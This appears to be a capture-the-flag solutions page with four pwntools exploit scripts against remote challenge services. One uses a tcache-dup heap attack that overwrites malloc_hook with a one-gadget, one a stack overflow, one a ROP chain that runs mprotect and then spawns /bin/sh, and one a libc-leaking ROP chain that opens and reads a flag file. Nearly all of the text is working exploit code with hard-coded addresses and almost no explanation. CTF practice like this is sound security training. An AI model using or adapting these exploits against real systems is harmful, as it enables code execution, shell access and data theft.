Encrheapt
Just malloc and free — a tcache dup.
It's freaking easy; just do it.
from pwn import *
#context.log_level = 'debug'
#p = process("./a.out")
# Open the pwntools tube to the challenge service (the local-process
# variant is left commented out above).
target_host = "challenges.ctfd.io"
target_port = 30028
p = remote(target_host, target_port)
def encrypt(ch, size, con):
    """Drive the service's "encrypt" menu action and return its output.

    Selects menu item 1, answers the '2)??: ' prompt with ``ch``, the
    key prompt with ``1``, then the size and content prompts with
    ``size`` and ``con``. Returns whatever the service prints after
    'Here is the encrypted content: ', with the trailing newline byte
    stripped.

    Uses the module-level tube ``p``.
    """
    # Each prompt fragment must be seen before its answer is sent; the
    # order mirrors the service's menu flow exactly.
    exchange = (
        ('3. Exit\n', '1'),
        ('2)??: ', str(ch)),
        (' key?:', '1'),
        ('How much would you like to encrypt: ', str(size)),
        ('What would you like to encrypt: ', con),
    )
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)
    p.recvuntil('Here is the encrypted content: ')
    reply = p.recvline()
    return reply[:-1]
def decrypt(ch):
    """Drive the service's "decrypt" menu action and return its output.

    Selects menu item 2 and answers the '2)??: ' prompt with ``ch``.
    Returns the text following 'content: ' with the trailing newline
    byte stripped.

    Uses the module-level tube ``p``.
    """
    menu_choice = '2'
    p.sendlineafter('3. Exit\n', menu_choice)
    p.sendlineafter('2)??: ', str(ch))
    p.recvuntil('content: ')
    reply = p.recvline()
    return reply[:-1]
def proc(addr):
    """Return ``addr`` XOR-ed with the repeating byte mask 0x01..01.

    The mask is its own inverse, so ``proc(proc(x)) == x``. The script
    applies it to values before handing them to ``encrypt``; presumably
    it compensates for a per-byte transform the service performs —
    confirm against the challenge binary.
    """
    BYTE_MASK = 0x0101010101010101
    return addr ^ BYTE_MASK
# Interaction sequence against the service (see encrypt/decrypt above).
encrypt(1, 2000, 'dummy')  # entry 1, size 2000
encrypt(2, 1, '1')         # entry 2, size 1
#make unsorted bin
decrypt(1)
leak = encrypt(1, 2000, '1')
# Pad the returned content to a full qword and unpack it little-endian.
leak = leak.ljust(8, b'\x00')
leak = u64(leak)
malloc_hook = leak
# Build-specific offsets from the author's environment; they are not
# derivable from this page and only hold for the same libc build.
libc_base = leak - 0x3afc30
one_shot = libc_base + 0x41656
encrypt(2, 0x60, 'dummy')
encrypt(1, 0x60, 'dummy')
decrypt(1)
decrypt(2)
decrypt(2)
#exploit tcache dup
# Both values pass through proc() before being sent as content.
malloc_hook = proc(malloc_hook)
one_shot = proc(one_shot)
encrypt(2, 0x60, p64(malloc_hook))
encrypt(2, 0x60, 'a')
encrypt(1, 0x60, p64(one_shot))
p.interactive()
bof
from pwn import *
context.log_level = 'debug'  # presumably to log the raw tube traffic
p = remote('challenges.ctfd.io', 30027)
#p = process('./bof.out')
p.sendlineafter(':', 'bjloed')
#p.sendlineafter(':', 'A'*42+p32(0x8049236))
# One raw send (no trailing newline) after the second ':' prompt. The
# payload concatenates str with p32() output, which relies on Python 2
# string semantics. The constants are the author's; their meaning is not
# explained on this page.
p.sendafter(':', 'BB' + 'flag'*6 + p32(0xdeadbeef)*4 + p32(0x8049236) + p32(0x14b4da55)*2 + p32(0) + 'flag' + p32(0))
p.interactive()
tiny-tim
from pwn import *
context.log_level = 'debug'  # presumably to log the raw tube traffic
p = remote('challenges.ctfd.io', 30017)
# Code addresses hard-coded for this challenge binary (author's values;
# a different build would not share them). `vuln` is assigned but never
# referenced below.
pop_rdi = 0x401004
pop_rsi = 0x401002
pop_rdx = 0x401006
vuln = 0x401008
secret = 0x401000
syscall = 0x40101e
# 0x20 bytes of 'A' filler plus 8 bytes of 'B' precede the chain. The
# chain is three groups of pop gadgets each ending in `syscall`, separated
# by 5-qword filler runs. str and p64() bytes are concatenated, which
# relies on Python 2 string semantics.
payload = 'A'*0x20 + 'B'*0x8 + p64(pop_rdi) + p64(0x400000) + p64(pop_rsi) + p64(1024) + p64(pop_rdx) + p64(7) + p64(secret) + p64(10) + p64(syscall) + p64(0x4242424242424242)*5 + p64(secret) + p64(0) + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x400000) + p64(pop_rdx) + p64(0x8) + p64(syscall) + p64(0x4343434343434343)*5 + p64(secret) + p64(59) + p64(pop_rdi) + p64(0x400000) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(syscall)
p.send(payload)
# A second, separate message is sent once the chain has been delivered.
p.send('/bin/sh\x00')
p.interactive()
SandboxROP
The file descriptor is 5.
from pwn import *
context.log_level = 'debug'  # presumably to log the raw tube traffic
p = remote('challenges.ctfd.io',30018)
# Both ELF objects must exist locally; `e` is loaded but never used below
# (only `libc` symbols are read).
e = ELF('./chal.out')
libc = ELF('./libc.so.6')
# Addresses hard-coded for this challenge binary (author's values).
# `main` is assigned but not referenced; 0x40131f is used instead.
pop_rdi = 0x4013a3
pop_rsi_r15 = 0x4013a1
pop_rdx = 0x4011de
bss = 0x404500
main = 0x4012f3
puts_plt = 0x4010b0
puts_got = 0x404028
# First stage: 0x10 bytes of filler, then the chain. str and p64() bytes
# are concatenated, which relies on Python 2 string semantics.
payload = 'A'*0x10 + p64(bss)
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x40131f)
p.sendlineafter('shit\n', payload)
# Six bytes are read back and padded to a qword (str padding on the
# received data, again Python 2 semantics).
leak = u64(p.recv(6).ljust(8, '\x00'))
# The leak is taken relative to puts; despite the names, `fopen` and
# `fread` resolve libc's `open` and `read`.
base = leak - libc.symbols['puts']
fopen = base + libc.symbols['open']
fread = base + libc.symbols['read']
# Second stage: a 16-byte path string followed by the chain.
payload = '/pwn/flag.txt\x00\x00\x00' + p64(bss+0x100) #0x4044f0
payload += p64(pop_rdi) + p64(bss-0x10) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(fopen)
# The first argument 5 matches the file descriptor noted above.
payload += p64(pop_rdi) + p64(5) + p64(pop_rsi_r15) + p64(bss+0x200) + p64(0) + p64(pop_rdx) + p64(0x100) + p64(fread) #read
payload += p64(pop_rdi) + p64(bss+0x200) + p64(puts_plt) + p64(0x40131f)
log.info(hex(fopen))
p.send(payload)
p.interactive()